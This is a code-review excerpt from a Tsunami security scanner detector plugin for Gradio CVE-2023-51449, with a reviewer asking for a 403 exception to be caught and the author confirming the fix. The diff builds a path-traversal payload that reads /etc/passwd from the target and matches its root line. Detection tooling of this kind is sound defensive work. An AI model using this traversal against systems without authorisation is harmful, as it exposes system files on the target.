community/detectors/gradio_cve_2023_51449/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202351449/Cve202351449VulnDetector.java

```diff
@@ -0,0 +1,223 @@
+          + " URL.";
+
+  private static final String POST_UPLOAD_PATH = "upload";
+  private static final String GET_FILE_PATH = "file=";
+
+  @VisibleForTesting static final String DETECTION_STRING = "root:x:0:0:root";
+
+  private final HttpClient httpClient;
+
+  private final Clock utcClock;
+
+  @Inject
+  Cve202351449VulnDetector(@UtcClock Clock utcClock, HttpClient httpClient) {
+    this.utcClock = checkNotNull(utcClock);
+    this.httpClient = checkNotNull(httpClient);
+  }
+
+  private static boolean isWebServiceOrUnknownService(NetworkService networkService) {
+    return networkService.getServiceName().isEmpty()
+        || NetworkServiceUtils.isWebService(networkService)
+        || NetworkServiceUtils.getServiceName(networkService).equals("unknown");
+  }
+
+  private static StringBuilder buildTarget(NetworkService networkService) {
+    StringBuilder targetUrlBuilder = new StringBuilder();
+    if (NetworkServiceUtils.isWebService(networkService)) {
+      targetUrlBuilder.append(NetworkServiceUtils.buildWebApplicationRootUrl(networkService));
+    } else {
+      targetUrlBuilder
+          .append("https://")
+          .append(toUriAuthority(networkService.getNetworkEndpoint()))
+          .append("/");
+    }
+    return targetUrlBuilder;
+  }
+
+  private HttpResponse sendUploadRequest(NetworkService networkService) throws IOException {
+    String uploadUrl = buildTarget(networkService).append(POST_UPLOAD_PATH).toString();
+    MultipartBody fileRequest =
+        new MultipartBody.Builder()
+            .setType(MultipartBody.FORM)
+            .addFormDataPart(
+                "files",
+                "tsunami_gradio_test.txt",
+                RequestBody.create(MediaType.parse("text/plain"), "Hello world"))
+            .build();
+    Buffer fileBuffer = new Buffer();
+    fileRequest.writeTo(fileBuffer);
+
+    return httpClient.send(
+        post(uploadUrl)
+            .setHeaders(
+                HttpHeaders.builder()
+                    .addHeader(CONTENT_TYPE, fileRequest.contentType().toString())
+                    .addHeader(USER_AGENT, "Tsunami Scanner")
+                    .build())
+            .setRequestBody(ByteString.copyFrom(fileBuffer.readByteArray()))
+            .build(),
+        networkService);
+  }
+
+  private String producePathTravesalPayload(String tmpFile) {
+    Path tmpFilePath = Path.of(tmpFile);
+    Path parentDir = tmpFilePath.getParent();
+    int subdirCount = parentDir.getNameCount();
+    StringBuilder payloadBuilder = new StringBuilder();
+    payloadBuilder.append(parentDir.toString());
+    for (int i = 0; i < subdirCount; i++) {
+      payloadBuilder.append("/..");
+    }
+    payloadBuilder.append("/etc/passwd");
+
+    return payloadBuilder.toString();
+  }
+
+  private HttpResponse sendGetFileRequest(NetworkService networkService, String payload)
+      throws IOException {
```

Comment:
If the non-vuln server returns HTTP 403, the plugin currently throws this uncaught exception. Can you catch it please?

Reply:
@vsutedjo Oh yes, sure!

Reply:
Done! :heavy_check_mark: tested on testbeds :ok_hand: